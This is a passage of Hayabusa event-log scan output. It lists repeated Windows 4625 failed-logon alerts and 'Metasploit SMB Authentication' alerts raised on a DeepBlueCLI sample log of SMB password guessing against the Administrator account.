SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AxKUl1lynGY1ectn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.057 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vI5yUgukPBVRorJI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.094 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MmR29QcBKMGVQ8rB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.142 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: b7luV5GfiT0v0h7D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.177 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yA7pIDFgQbLIInqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 84g2gO0253Ut4O1O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.257 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DRkFX9WTAhBZ8jc8 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.296 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WuoQAi4k3XZPaf4O : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.337 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KjKMhCnbR0uFT0av : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.393 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1lfwqPB0AgTfIOt4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.442 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mJuG26pQzdjUQael : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.486 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GXwEziYTA3DkkFVq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CHr6dirvkT8B9ZVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.576 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: B5eSMLiF4BsfY3xN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 64ISDuFRhR6cFYVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hcprXytyuBw380XY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.693 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BxfQWiSIhZYxwNjh : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.733 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FcL982boDelzeyzK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBAAjRdaR8U0tqt7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EmqUjcltAW6StHQJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 129Rp3HCmRVRXw3C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jpIIQP2oWEF51EBI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.945 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HREGh5ppEkLAuEob : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:38.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: UVkpQvotEMfM8R0C : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.022 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dm6uHEy5RJJBJ6FG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HPTyAkYjcIlko5lu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OjlRoo9Sot4Fx4Th : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.155 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XslY26kw2aBw19D8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.205 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1404fakprYeqGiNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.242 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2VfIjtBcXCRlOjp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LPztyX4J9NV8EldT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.317 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 07flrrzWgsVBYaN2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vgkqkC1VvznGxR6N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.409 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: 
